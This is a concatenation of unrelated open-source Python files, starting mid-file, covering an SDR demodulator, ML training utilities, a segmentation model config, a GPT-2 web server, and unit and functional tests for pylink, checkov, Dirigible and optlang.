def get_executors_to_orders_dict(cls, time: datetime) -> Dict[SimulatedExecutor, List[Order]]:
"""
For an initialized object representing a certain single time event, returns the data associated with this event
in the form of a dictionary, with SimulatedExecutor as keys and list of Orders as values.
"""
return cls._datetimes_to_data[time]
|
mirage/libs/common/sdr/demodulators.py
|
tlechien/mirage
| 123 |
121491
|
<reponame>tlechien/mirage<filename>mirage/libs/common/sdr/demodulators.py
from mirage.libs.common.sdr.sources import SDRSource
from mirage.libs.common.sdr.decoders import SDRDecoder
from mirage.libs import utils,io
import queue,threading,math
'''
This component implements multiple Software Defined Radio demodulators allowing to demodulate an IQ stream to recover packet's data.
'''
class SDRDemodulator:
'''
This class implements a Sofware Defined Radio demodulator: every specific demodulator has to inherit from this class and implement the ``run`` method.
When the demodulator is started, it processes the IQ stream received from the ``SDRSource``, performs the operations needed to demodulate the stream and adds the demodulated packets to the output queue using ``generateOutput`` method.
'''
def __init__(self):
self.source = None
self.count = 0
self.decoders = []
self.running = False
self.output = queue.Queue()
def setSource(self,source):
'''
This method associates a ``SDRSource`` to the demodulator.
:param source: source to associate
:type source: ``SDRSource``
'''
if isinstance(source,SDRSource):
self.source = source
def addDecoder(self,decoder):
'''
This method associates a ``SDRDecoder`` to the demodulator.
:param decoder: decoder to associate
:type decoder: ``SDRDecoder``
'''
if isinstance(decoder, SDRDecoder):
self.decoders.append(decoder)
def getDecoders(self):
return self.decoders
def removeDecoders(self):
'''
This method removes every associated decoders.
'''
self.decoders = []
def generateOutput(self,demodulatedData,iqSamples):
'''
This method allows to generate an output, by providing the demodulated data and the corresponding IQ.
The output will be processed sequentially by every associated decoders, then it is added to the output queue.
:param demodulatedData: demodulated data
:type demodulatedData: bytes
:param iqSamples: IQ samples linked to the demodulated data
:type iqSamples: list of complex
'''
for d in self.decoders:
demodulatedData,iqSamples = d.decode(demodulatedData, iqSamples)
if demodulatedData is not None and iqSamples is not None:
self.output.put((demodulatedData,iqSamples))
def getOutput(self):
'''
This method returns the next demodulated and decoded element from the output queue.
:return: tuple of demodulated data and the correspond IQ samples
:rtype: (bytes, list of complex)
'''
if not self.output.empty():
return self.output.get()
else:
return None
def start(self):
'''
This method starts the demodulator.
:Example:
>>> demodulator.start()
'''
self.thread = threading.Thread(target=self.run,daemon=True)
self.running = True
self.thread.start()
def __del__(self):
self.stop()
def stop(self):
'''
This method stops the demodulator.
:Example:
>>> demodulator.start()
'''
self.running = False
def run(self):
pass
class FSK2Demodulator(SDRDemodulator):
'''
This demodulator allows to demodulate a 2-Frequency Shift Keying (2-FSK) stream.
'''
def __init__(self,samplesPerSymbol=1,samplesBefore=60 , samplesAfter=60,size=8*40,preamble = "01101011011111011001000101110001"):
super().__init__()
self.samplesPerSymbol = samplesPerSymbol
self.samplesBefore = samplesBefore
self.samplesAfter = samplesAfter
self.size = size
self.preamble = preamble
self.numberOfBuffers = samplesPerSymbol
self.demodBuffer = ["" for i in range(samplesPerSymbol)]
def run(self):
i = 0
step = 0
if self.source.running:
while i >= len(self.source.iqStream) and self.running:
utils.wait(seconds=0.001)
while self.running:
if i < len(self.source.iqStream):
i0 = self.source.iqStream[i-1].real
q0 = self.source.iqStream[i-1].imag
i1 = self.source.iqStream[i].real
q1 = self.source.iqStream[i].imag
self.demodBuffer[step] += "1" if math.atan2(i0*q1 - q0*i1,i0*i1+q0*q1) > 0 else "0"
if len(self.demodBuffer[step]) >= len(self.preamble):
if self.preamble != self.demodBuffer[step][:len(self.preamble)]:
self.demodBuffer[step] = self.demodBuffer[step][1:]
else:
if len(self.demodBuffer[step]) == self.size:
demodulatedBlock = self.demodBuffer[step]
iqBlock = self.source.iqStream[(i-1)-((self.size-1)*self.numberOfBuffers)-self.samplesBefore:i+self.samplesAfter]
self.generateOutput(demodulatedBlock,iqBlock)
self.source.iqStream = self.source.iqStream[i+1:]
i = 1
self.count += 1
for j in range(self.numberOfBuffers):
self.demodBuffer[j] = ""
step = (step + 1) % self.numberOfBuffers
i += 1
else:
self.running = False
class FasterFSK2Demodulator(SDRDemodulator):
'''
This **experimental** demodulator allows to demodulate a 2-Frequency Shift Keying stream.
It is an experimental demodulator based on a amplitude filter, which tries to estimate the noise level to demodulate the stream only if the amplitude is above the noise thresold.
The main objective of this implementation is to increase the demodulator's speed, however it may miss some packets if the noise thresold is wrong.
'''
def __init__(self,samplesPerSymbol=1,samplesBefore=60 , samplesAfter=60,size=8*40,preamble = "01101011011111011001000101110001"):
super().__init__()
self.samplesPerSymbol = samplesPerSymbol
self.samplesBefore = samplesBefore
self.samplesAfter = samplesAfter
self.size = size
self.noiseThresold = None
self.preamble = preamble
self.numberOfBuffers = samplesPerSymbol
self.noiseLevel = 0
self.noiseState = []
self.demodBuffer = ["" for i in range(samplesPerSymbol)]
def stop(self):
self.running = False
self.noiseLevel = 0
self.noiseThresold = None
def run(self):
i = 0
step = 0
demodulating = False
demodulatingCount = 0
if self.source.running:
while i >= len(self.source.iqStream) and self.running:
utils.wait(seconds=0.00001)
while self.running:
if i < len(self.source.iqStream):
if not demodulating:
increment = (self.size*self.numberOfBuffers) // 2
if self.noiseThresold is None:
values = []
for j in range(increment,self.source.blockLength // 2,increment):
values += [self.source.iqStream[j].imag*self.source.iqStream[j].imag+self.source.iqStream[j].real*self.source.iqStream[j].real]
self.noiseThresold = sum(values)/len(values)
#io.info("<Experimental Demodulator> Noise thresold: "+str(self.noiseThresold))
else:
amplitude = self.source.iqStream[i].real*self.source.iqStream[i].real+self.source.iqStream[i].imag*self.source.iqStream[i].imag
if len(self.noiseState) == 10:
if self.noiseState.count(False) > self.noiseState.count(True):
self.noiseLevel += 0.25
self.noiseState = []
if amplitude > self.noiseThresold*self.noiseLevel:
if i - increment > 1:
demodulatingCount = self.size * self.numberOfBuffers * 2
demodulating = True
i -= increment
self.source.iqStream = self.source.iqStream[i-self.samplesBefore:] # test !!!
i = self.samplesBefore
else:
i += increment
else:
i += increment
else:
i0 = self.source.iqStream[i-1].real
q0 = self.source.iqStream[i-1].imag
i1 = self.source.iqStream[i].real
q1 = self.source.iqStream[i].imag
self.demodBuffer[step] += "1" if math.atan2(i0*q1 - q0*i1,i0*i1+q0*q1) > 0 else "0"# (i0*q1 - i1*q0)
if len(self.demodBuffer[step]) >= len(self.preamble):
if self.preamble != self.demodBuffer[step][:len(self.preamble)]:
self.demodBuffer[step] = self.demodBuffer[step][1:]
else:
if len(self.demodBuffer[step]) == self.size:
demodulatedBlock = self.demodBuffer[step]
iqBlock = self.source.iqStream[(i-1)-((self.size-1)*self.numberOfBuffers)-self.samplesBefore:i+self.samplesAfter]
self.generateOutput(demodulatedBlock,iqBlock)
self.source.iqStream = self.source.iqStream[i+1:]
i = 1
self.count += 1
self.noiseState.append(True)
for j in range(self.numberOfBuffers):
self.demodBuffer[j] = ""
demodulating = False
step = (step + 1) % self.numberOfBuffers
i += 1
demodulatingCount -= 1
if demodulatingCount <= 0:
self.noiseState.append(False)
for j in range(self.numberOfBuffers):
self.demodBuffer[j] = ""
demodulating = False
self.running = False
else:
self.running = False
|
util/model_saver.py
|
segcv/CascadePSP
| 606 |
121520
|
<reponame>segcv/CascadePSP
import os
import torch
class ModelSaver:
def __init__(self, id):
if id is None:
self.no_log = True
print('Saving has been disbaled.')
else:
self.no_log = False
self.save_path = os.path.join('.', 'weights', '%s' % id )
def save_model(self, model, step):
if self.no_log:
print('Saving has been disabled.')
return
os.makedirs(self.save_path, exist_ok=True)
model_path = os.path.join(self.save_path, 'model_%s' % step)
torch.save(model.state_dict(), model_path)
print('Model saved to %s.' % model_path)
|
tests/unit/test_threads.py
|
dia38/pylink
| 217 |
121558
|
<gh_stars>100-1000
# Copyright 2017 Square, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pylink.threads as threads
import unittest
class TestThreads(unittest.TestCase):
"""Unit test for the `threads` submodule."""
def setUp(self):
"""Called before each test.
Performs setup.
Args:
self (TestThreads): the `TestThreads` instance
Returns:
`None`
"""
pass
def tearDown(self):
"""Called after each test.
Performs teardown.
Args:
self (TestThreads): the `TestThreads` instance
Returns:
`None`
"""
pass
def test_thread(self):
"""Tests that a thread can be created and joined for a return value.
Args:
self (TestThreads): the `TestThreads` instance
Returns:
`None`
"""
def thread_func():
return 4
def thread_func_with_args(x, y):
return (x + y)
thread = threads.ThreadReturn(target=thread_func)
thread.start()
self.assertEqual(4, thread.join())
thread = threads.ThreadReturn(target=thread_func_with_args, args=(2, 3))
thread.start()
self.assertEqual(5, thread.join())
if __name__ == '__main__':
unittest.main()
|
ui/operator_ui/oauth.py
|
Prototik/postgres-operator
| 2,061 |
121564
|
<reponame>Prototik/postgres-operator
import os
from flask_oauthlib.client import OAuthRemoteApp
CREDENTIALS_DIR = os.getenv('CREDENTIALS_DIR', '')
class OAuthRemoteAppWithRefresh(OAuthRemoteApp):
'''Same as flask_oauthlib.client.OAuthRemoteApp, but always loads client credentials from file.'''
def __init__(self, oauth, name, **kwargs):
# constructor expects some values, so make it happy..
kwargs['consumer_key'] = 'not-needed-here'
kwargs['consumer_secret'] = 'not-needed-here'
OAuthRemoteApp.__init__(self, oauth, name, **kwargs)
def refresh_credentials(self):
with open(os.path.join(CREDENTIALS_DIR, 'authcode-client-id')) as fd:
self._consumer_key = fd.read().strip()
with open(os.path.join(CREDENTIALS_DIR, 'authcode-client-secret')) as fd:
self._consumer_secret = fd.read().strip()
@property
def consumer_key(self):
self.refresh_credentials()
return self._consumer_key
@property
def consumer_secrect(self):
self.refresh_credentials()
return self._consumer_secret
|
robot-server/robot_server/service/protocol/environment.py
|
knownmed/opentrons
| 235 |
121565
|
import os
import sys
from robot_server.service.protocol import contents
from contextlib import contextmanager
@contextmanager
def protocol_environment(protocol: contents.Contents):
"""
Context manager used for setting up an environment to run a
UploadProtocol.
"""
old_cwd = os.getcwd()
# Change working directory to temp dir
os.chdir(protocol.directory.name)
# Add temp dir to path after caching path
old_path = sys.path.copy()
sys.path.append(protocol.directory.name)
try:
yield contents
finally:
os.chdir(old_cwd)
sys.path = old_path
|
fna_det/tools/hooks/optimizer.py
|
BaiYuYuan/FNA
| 173 |
121570
|
import torch
from mmcv.runner import OptimizerHook
from mmdet.core.utils.dist_utils import allreduce_grads
from collections import OrderedDict
import torch.distributed as dist
from torch._utils import (_flatten_dense_tensors, _unflatten_dense_tensors,
_take_tensors)
class ArchOptimizerHook(OptimizerHook):
def after_train_iter(self, runner):
runner.arch_optimizer.zero_grad()
if runner.sub_obj_cfg.if_sub_obj:
loss_sub_obj = torch.log(runner.outputs['sub_obj']) / \
torch.log(torch.tensor(runner.sub_obj_cfg.log_base))
runner.outputs['loss'] += loss_sub_obj * runner.sub_obj_cfg.sub_loss_factor
runner.outputs['loss'].backward()
if self.grad_clip is not None:
self.clip_grads(runner.model.parameters())
runner.arch_optimizer.step()
self.rescale_arch_params(runner.super_backbone)
def rescale_arch_params(self, model):
"""
rescale the architecture parameters
that is to add the rescale_value (bias) to the updated architecture parameters
to maintain the magnitude of the softmax outputs of non-updated params
"""
def comp_rescale_value(old_weights, new_weights, index, block_id, branch_id):
old_exp_sum = old_weights.exp().sum()
new_drop_arch_params = [new_weights[block_id][branch_id][h_idx
] for h_idx in index]
new_exp_sum = torch.stack(new_drop_arch_params).exp().sum()
rescale_value = torch.log(old_exp_sum / new_exp_sum)
return rescale_value
if hasattr(model, 'module'):
model = model.module
alpha_head_index = model.alpha_head_index
alpha_head_weights_drop = model.alpha_head_weights_drop
alpha_stack_index = model.alpha_stack_index
alpha_stack_weights_drop = model.alpha_stack_weights_drop
# rescale the arch params for head layers
for i, (alpha_head_weights_drop_block, alpha_head_index_block) in enumerate(
zip(alpha_head_weights_drop, alpha_head_index)):
for j, (alpha_head_weights_drop_branch, alpha_head_index_branch) in enumerate(
zip(alpha_head_weights_drop_block, alpha_head_index_block)):
rescale_value = comp_rescale_value(alpha_head_weights_drop_branch,
model.alpha_head_weights,
alpha_head_index_branch, i, j)
for idx in alpha_head_index_branch:
model.alpha_head_weights[i].data[j][idx] += rescale_value
# rescale the arch params for stack layers
for i, (alpha_stack_weights_drop_block, alpha_stack_index_block) in enumerate(
zip(alpha_stack_weights_drop, alpha_stack_index)):
for j, (alpha_stack_weights_drop_branch, alpha_stack_index_branch) in enumerate(
zip(alpha_stack_weights_drop_block, alpha_stack_index_block)):
rescale_value = comp_rescale_value(alpha_stack_weights_drop_branch,
model.alpha_stack_weights,
alpha_stack_index_branch, i, j)
for idx in alpha_stack_index_branch:
model.alpha_stack_weights[i].data[j][idx] += rescale_value
class ArchDistOptimizerHook(ArchOptimizerHook):
def __init__(self, grad_clip=None, coalesce=True, bucket_size_mb=-1):
self.grad_clip = grad_clip
self.coalesce = coalesce
self.bucket_size_mb = bucket_size_mb
def after_train_iter(self, runner):
runner.arch_optimizer.zero_grad()
if runner.sub_obj_cfg.if_sub_obj:
loss_sub_obj = torch.log(runner.outputs['sub_obj']) / \
torch.log(torch.tensor(runner.sub_obj_cfg.log_base))
runner.outputs['loss'] += loss_sub_obj * runner.sub_obj_cfg.sub_loss_factor
runner.outputs['loss'].backward()
allreduce_grads(runner.model, self.coalesce, self.bucket_size_mb)
if self.grad_clip is not None:
self.clip_grads(runner.model.parameters())
runner.arch_optimizer.step()
# self.rescale_arch_params(runner.super_backbone)
|
InnerEye/ML/configs/segmentation/HeadAndNeckPaper.py
|
JacopoTeneggi/InnerEye-DeepLearning
| 402 |
121590
|
<reponame>JacopoTeneggi/InnerEye-DeepLearning
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
import random
from typing import Any, Optional
from InnerEye.ML.config import SliceExclusionRule, SummedProbabilityRule, equally_weighted_classes
from InnerEye.ML.configs.segmentation.HeadAndNeckBase import HeadAndNeckBase
from InnerEye.ML.utils.model_metadata_util import generate_random_colours_list
# List of structures to segment. The order is important, because different values of num_structures
# in the constructor will select different prefixes of the list.
STRUCTURE_LIST = ["external", "parotid_l", "parotid_r", "smg_l", "smg_r", "spinal_cord", "brainstem",
"globe_l", "globe_r", "mandible", "spc_muscle", "mpc_muscle", "cochlea_l", "cochlea_r",
"lens_l", "lens_r", "optic_chiasm", "optic_nerve_l", "optic_nerve_r", "pituitary_gland",
"lacrimal_gland_l", "lacrimal_gland_r"]
RANDOM_COLOUR_GENERATOR = random.Random(0)
COLOURS = generate_random_colours_list(RANDOM_COLOUR_GENERATOR, len(STRUCTURE_LIST))
class HeadAndNeckPaper(HeadAndNeckBase):
"""
Head and Neck model, as used in the paper.
"""
def __init__(self, num_structures: Optional[int] = None, **kwargs: Any) -> None:
"""
Creates a new instance of the class.
:param num_structures: number of structures from STRUCTURE_LIST to predict (default: all structures)
:param kwargs: Additional arguments that will be passed through to the SegmentationModelBase constructor.
"""
# Number of structures to predict; if positive but less than the length of STRUCTURE_LIST, the relevant prefix
# of STRUCTURE_LIST will be predicted.
if (num_structures is not None) and \
(num_structures <= 0 or num_structures > len(STRUCTURE_LIST)):
raise ValueError(f"num structures must be between 0 and {len(STRUCTURE_LIST)}")
if num_structures is None:
logging.info(f'Setting num_structures to: {len(STRUCTURE_LIST)}')
num_structures = len(STRUCTURE_LIST)
ground_truth_ids = STRUCTURE_LIST[:num_structures]
if "ground_truth_ids_display_names" in kwargs:
ground_truth_ids_display_names = kwargs.pop("ground_truth_ids_display_names")
else:
logging.info('Using default ground_truth_ids_display_names')
ground_truth_ids_display_names = [f"zz_{x}" for x in ground_truth_ids]
if "colours" in kwargs:
colours = kwargs.pop("colours")
else:
logging.info('Using default colours')
colours = COLOURS[:num_structures]
if "fill_holes" in kwargs:
fill_holes = kwargs.pop("fill_holes")
else:
logging.info('Using default fill_holes')
fill_holes = [True] * num_structures
# The amount of GPU memory required increases with both the number of structures and the
# number of feature channels. The following is a sensible default to avoid out-of-memory,
# but you can override is by passing in another (singleton list) value for feature_channels
# from a subclass.
if "num_feature_channels" in kwargs:
num_feature_channels = kwargs.pop("num_feature_channels")
else:
logging.info('Using default num_feature_channels')
num_feature_channels = 32 if num_structures <= 20 else 26
bg_weight = 0.02 if len(ground_truth_ids) > 1 else 0.25
if "class_weights" in kwargs:
class_weights = kwargs.pop("class_weights")
else:
logging.info('Using default class_weights')
class_weights = equally_weighted_classes(ground_truth_ids, background_weight=bg_weight)
# In case of vertical overlap between brainstem and spinal_cord, we separate them
# by converting brainstem voxels to cord, as the latter is clinically more sensitive.
# We do the same to separate SPC and MPC; in this case, the direction of change is unimportant,
# so we choose SPC-to-MPC arbitrarily.
if "slice_exclusion_rules" in kwargs:
slice_exclusion_rules = kwargs.pop("slice_exclusion_rules")
else:
logging.info('Using default slice_exclusion_rules')
slice_exclusion_rules = []
if "brainstem" in ground_truth_ids and "spinal_cord" in ground_truth_ids:
slice_exclusion_rules.append(SliceExclusionRule("brainstem", "spinal_cord", False))
if "spc_muscle" in ground_truth_ids and "mpc_muscle" in ground_truth_ids:
slice_exclusion_rules.append(SliceExclusionRule("spc_muscle", "mpc_muscle", False))
if "optic_chiasm" in ground_truth_ids and "pituitary_gland" in ground_truth_ids:
slice_exclusion_rules.append(SliceExclusionRule("optic_chiasm", "pituitary_gland", True))
if "summed_probability_rules" in kwargs:
summed_probability_rules = kwargs.pop("summed_probability_rules")
else:
logging.info('Using default summed_probability_rules')
summed_probability_rules = []
if "brainstem" in ground_truth_ids and "spinal_cord" in ground_truth_ids and \
"external" in ground_truth_ids:
summed_probability_rules.append(SummedProbabilityRule("spinal_cord", "brainstem", "external"))
if "spc_muscle" in ground_truth_ids and "mpc_muscle" in ground_truth_ids and \
"external" in ground_truth_ids:
summed_probability_rules.append(SummedProbabilityRule("mpc_muscle", "spc_muscle", "external"))
if "optic_chiasm" in ground_truth_ids and "pituitary_gland" in ground_truth_ids and \
"external" in ground_truth_ids:
summed_probability_rules.append(SummedProbabilityRule("optic_chiasm", "pituitary_gland", "external"))
super().__init__(
ground_truth_ids=ground_truth_ids,
ground_truth_ids_display_names=ground_truth_ids_display_names,
colours=colours,
fill_holes=fill_holes,
class_weights=class_weights,
slice_exclusion_rules=slice_exclusion_rules,
summed_probability_rules=summed_probability_rules,
num_feature_channels=num_feature_channels,
**kwargs)
|
src/schnetpack/md/utils/__init__.py
|
giadefa/schnetpack
| 450 |
121598
|
<reponame>giadefa/schnetpack<filename>src/schnetpack/md/utils/__init__.py
"""
This module contains various utility functions and classes used in combination with :obj:`schnetpack.md`.
This includes e.g. unit conversion, loading of molecular dynamics data and the computation of spectra.
"""
from .basic_utils import *
from .md_units import *
from .hdf5_data import *
from .normal_mode_transformation import *
from .spectra import *
from .thermostat_utils import *
|
examples/hacker_news_app.py
|
dalraf/gpt-2-cloud-run
| 298 |
121642
|
from starlette.applications import Starlette
from starlette.responses import UJSONResponse
import gpt_2_simple as gpt2
import uvicorn
import os
app = Starlette(debug=False)
sess = gpt2.start_tf_sess(threads=1)
gpt2.load_gpt2(sess)
@app.route('/', methods=['GET', 'POST'])
async def homepage(request):
if request.method == 'GET':
params = request.query_params
elif request.method == 'POST':
params = await request.json()
text = gpt2.generate(sess,
length=100,
temperature=float(params.get('temperature', 0.7)),
top_k=int(params.get('top_k', 0)),
prefix='<|startoftext|>' + params.get('prefix', ''),
truncate='<|endoftext|>',
include_prefix=str(params.get(
'include_prefix', True)).lower() == 'true',
return_as_list=True
)[0]
# strip <|startoftext|>
text = text[len('<|startoftext|>'):]
return UJSONResponse({'text': text})
if __name__ == '__main__':
uvicorn.run(app, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))
|
nni/retiarii/debug_configs.py
|
dutxubo/nni
| 9,680 |
121670
|
<reponame>dutxubo/nni
# we will support tensorflow in future release
framework = 'pytorch'
|
module/gui/geoLGobal.py
|
Appnet1337/OSINT-SAN
| 313 |
121705
|
import os
dirpath = os.getcwd()
print("Current working directory is : %s" % dirpath)
APP_NAME = 'OSINT SAN Геолокация'
#------<IMAGES PATH>-------------------------------------------------------------
IMG_FD = 'img'
ICO_PATH = os.path.join(dirpath, IMG_FD, "geoIcon.ico")
BGIMG_PATH = os.path.join(dirpath, IMG_FD, "background.jpg")
DC_POS_PATH = os.path.join(dirpath, "awsRecord.txt")
#-------<GLOBAL PARAMTERS>-----------------------------------------------------
iCtrlPanel = None # panel to do the control
iMapPanel = None # panel to display the google map.
iGeoMgr = None # program control manager.
iDCPosMgr = None # data ceter position manager.
|
tests/terraform/checks/resource/azure/test_FunctionAppsEnableAuthentication.py
|
kylelaker/checkov
| 4,013 |
121708
|
import unittest
import hcl2
from checkov.terraform.checks.resource.azure.FunctionAppsEnableAuthentication import check
from checkov.common.models.enums import CheckResult
class TestFunctionAppsEnableAuthentication(unittest.TestCase):
def test_failure_missing_authentication_block(self):
hcl_res = hcl2.loads("""
resource "azurerm_function_app" "example" {
name = "test-azure-functions"
location = "azurerm_resource_group.example.location"
resource_group_name = "azurerm_resource_group.example.name"
app_service_plan_id = "azurerm_app_service_plan.example.id"
storage_account_name = "azurerm_storage_account.example.name"
storage_account_access_key = "azurerm_storage_account.example.primary_access_key"
}
""")
resource_conf = hcl_res['resource'][0]['azurerm_function_app']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
hcl_res = hcl2.loads("""
resource "azurerm_function_app" "example" {
name = "test-azure-functions"
location = "azurerm_resource_group.example.location"
resource_group_name = "azurerm_resource_group.example.name"
app_service_plan_id = "azurerm_app_service_plan.example.id"
storage_account_name = "azurerm_storage_account.example.name"
storage_account_access_key = "azurerm_storage_account.example.primary_access_key"
auth_settings {
enabled = true
}
}
""")
resource_conf = hcl_res['resource'][0]['azurerm_function_app']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
def test_failed(self):
hcl_res = hcl2.loads("""
resource "azurerm_function_app" "example" {
name = "test-azure-functions"
location = "azurerm_resource_group.example.location"
resource_group_name = "azurerm_resource_group.example.name"
app_service_plan_id = "azurerm_app_service_plan.example.id"
storage_account_name = "azurerm_storage_account.example.name"
storage_account_access_key = "azurerm_storage_account.example.primary_access_key"
auth_settings {
enabled = false
}
}
""")
resource_conf = hcl_res['resource'][0]['azurerm_function_app']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
if __name__ == '__main__':
unittest.main()
|
dirigible/fts/tests/test_2546_ListSheetsOnDashboard.py
|
EnoX1/dirigible-spreadsheet
| 168 |
121800
|
<reponame>EnoX1/dirigible-spreadsheet<gh_stars>100-1000
# Copyright (c) 2010 Resolver Systems Ltd.
# All Rights Reserved
#
from functionaltest import FunctionalTest, SERVER_IP, snapshot_on_error
import key_codes
class Test_2546_ListSheetsOnDashboard(FunctionalTest):
def rename_current_sheet(self, name):
self.selenium.click('id=id_sheet_name')
self.wait_for(
lambda: self.is_element_present('id=edit-id_sheet_name'),
lambda: 'edit sheetname textbox to appear')
self.selenium.type('id=edit-id_sheet_name', name)
self.human_key_press(key_codes.ENTER)
self.wait_for_element_presence('id=saving-id_sheet_name', False)
def assert_sheet_is_listed(self, sheet_id, sheet_name=None):
if sheet_name is None:
sheet_name = 'Sheet %s' % (sheet_id,)
expected_url = '/user/%s/sheet/%s/' % (self.get_my_username(), sheet_id)
link_text = self.get_text(
'css=a[href="%s"]' % (expected_url,))
# "xpath=//a[contains(@href, '%s')]" % (expected_url,))
self.assertEquals(link_text, sheet_name)
@snapshot_on_error
def test_list_exists(self):
# * Harold logs in to Dirigible.
self.login()
# * He notes that he is being told that he has no sheets.
self.assertTrue(
self.is_element_present('id=id_no_sheets_message'),
"Could not find 'no sheets' message"
)
# * He decides that he wants one, so he clicks on a button to create it.
sheet1_id = self.create_new_sheet()
# * He clicks 'my account' and goes back to dashboard page
# * His new sheet is listed there, with a link to it
self.click_link('id_account_link')
self.assert_sheet_is_listed(sheet1_id)
# He notes that the "no sheets" message is absent.
self.assertFalse(
self.is_element_present('id=id_no_sheets_message'),
"Found 'no sheets' message when it wasn't expected"
)
# * He clicks new sheet again
sheet2_id = self.create_new_sheet()
# * He renames the second sheet
self.rename_current_sheet('Snarf')
# * He clicks 'my account' and goes back to dashboard page
self.click_link('id_account_link')
# * Both sheets are listed there
self.assert_sheet_is_listed(sheet1_id)
self.assert_sheet_is_listed(sheet2_id, 'Snarf')
|
src/optlang/tests/test_coinor_cbc_interface.py
|
Wealing/optlang
| 140 |
121826
|
<gh_stars>100-1000
# Copyright (c) 2013 Novo Nordisk Foundation Center for Biosustainability, DTU.
# See LICENSE for details.
import unittest
import json
import os
import optlang.interface
import pickle
import copy
import sys
try:
import mip
except ImportError as e:
if str(e).find('mip') >= 0:
class TestMissingDependency(unittest.TestCase):
@unittest.skip('Missing dependency - ' + str(e))
def test_fail(self):
pass
else:
raise
else:
from optlang import coinor_cbc_interface
from optlang.tests import abstract_test_cases
TESTMODELPATH = os.path.join(os.path.dirname(__file__), 'data/coli_core.json')
def same_ex(ex1, ex2):
"""Compare to expressions for mathematical equality."""
return ex1.simplify() == ex2.simplify()
class VariableTestCase(abstract_test_cases.AbstractVariableTestCase):
interface = coinor_cbc_interface
def test_get_primal(self):
self.assertEqual(self.var.primal, None)
with open(TESTMODELPATH) as infile:
model = self.interface.Model.from_json(json.load(infile))
model.optimize()
self.assertEqual(model.status, optlang.interface.OPTIMAL)
for var in model.variables:
self.assertTrue(var.lb <= round(var.primal, 6) <= var.ub, (var.lb, var.primal, var.ub))
@unittest.skip("COIN-OR Cbc doesn't support variable name change")
def test_changing_variable_names_is_reflected_in_the_solver(self):
pass
@unittest.skip("COIN-OR Cbc doesn't support variable name change")
def test_change_name(self):
pass
def test_set_wrong_type_raises(self):
self.assertRaises(ValueError, self.interface.Variable, name="test", type="mayo")
self.assertRaises(Exception, setattr, self.var, 'type', 'ketchup')
self.model.add(self.var)
self.model.update()
self.assertRaises(ValueError, setattr, self.var, "type", "mustard")
def test_change_type(self):
self.var.type = "continuous"
self.assertEqual(self.var.lb, None)
self.assertEqual(self.var.ub, None)
self.var.type = "integer"
self.assertEqual(self.var.lb, None)
self.assertEqual(self.var.ub, None)
self.var.type = "binary"
self.assertEqual(self.var.lb, 0)
self.assertEqual(self.var.ub, 1)
self.var.type = "integer"
self.assertEqual(self.var.lb, 0)
self.assertEqual(self.var.ub, 1)
self.var.type = "continuous"
self.assertEqual(self.var.lb, 0)
self.assertEqual(self.var.ub, 1)
self.var.lb = -1.4
self.var.ub = 1.6
self.var.type = "integer"
self.assertEqual(self.var.lb, -1)
self.assertEqual(self.var.ub, 2)
class ConstraintTestCase(abstract_test_cases.AbstractConstraintTestCase):
interface = coinor_cbc_interface
def test_get_primal(self):
with open(TESTMODELPATH) as infile:
self.model = self.interface.Model.from_json(json.load(infile))
self.assertEqual(self.constraint.primal, None)
self.model.optimize()
for c in self.model.constraints:
if c.lb is not None:
self.assertTrue(c.lb <= round(c.primal, 6))
if c.ub is not None:
self.assertTrue(round(c.primal, 6) <= c.ub)
@unittest.skip("COIN-OR Cbc doesn't support constraint name change")
def test_change_constraint_name(self):
pass
@unittest.skip("TODO: Currently not supported")
def test_indicator_constraint_support(self):
pass
class ObjectiveTestCase(abstract_test_cases.AbstractObjectiveTestCase):
interface = coinor_cbc_interface
def setUp(self):
with open(TESTMODELPATH) as infile:
self.model = self.interface.Model.from_json(json.load(infile))
self.obj = self.model.objective
def test_change_direction(self):
from mip import MAXIMIZE, MINIMIZE
self.obj.direction = "min"
self.assertEqual(self.obj.direction, "min")
self.assertEqual(self.model.problem.sense, MINIMIZE)
self.obj.direction = "max"
self.assertEqual(self.obj.direction, "max")
self.assertEqual(self.model.problem.sense, MAXIMIZE)
class ConfigurationTestCase(abstract_test_cases.AbstractConfigurationTestCase):
interface = coinor_cbc_interface
class ModelTestCase(abstract_test_cases.AbstractModelTestCase):
interface = coinor_cbc_interface
def setUp(self):
with open(TESTMODELPATH) as infile:
self.model = self.interface.Model.from_json(json.load(infile))
def test_pickle_ability(self):
self.model.optimize()
value = self.model.objective.value
pickle_string = pickle.dumps(self.model)
from_pickle = pickle.loads(pickle_string)
from_pickle.optimize()
self.assertAlmostEqual(value, from_pickle.objective.value)
self.assertEqual([(var.lb, var.ub, var.name, var.type) for var in from_pickle.variables.values()],
[(var.lb, var.ub, var.name, var.type) for var in self.model.variables.values()])
self.assertEqual([(constr.lb, constr.ub, constr.name) for constr in from_pickle.constraints],
[(constr.lb, constr.ub, constr.name) for constr in self.model.constraints])
def test_config_gets_copied_too(self):
self.assertEqual(self.model.configuration.verbosity, 0)
self.model.configuration.verbosity = 3
model_copy = copy.copy(self.model)
self.assertEqual(model_copy.configuration.verbosity, 3)
def test_init_from_existing_problem(self):
self.assertEqual(len(self.model.variables), len(self.model.problem.vars))
# Divide by 2 because upper and lower constraints are represented seperately
self.assertEqual(len(self.model.constraints), len(self.model.problem.constrs) / 2)
self.assertEqual(self.model.variables.keys(),
[var.name[2:] for var in self.model.problem.vars])
# Collect _lower and _upper constraints
constrs= []
for con in self.model.constraints:
constrs.append(con.constraint_name(True))
constrs.append(con.constraint_name(False))
self.assertEqual(constrs, [constr.name for constr in self.model.problem.constrs])
def test_add_non_cplex_conform_variable(self):
var = self.interface.Variable('12x!!@#5_3', lb=-666, ub=666)
self.model.add(var)
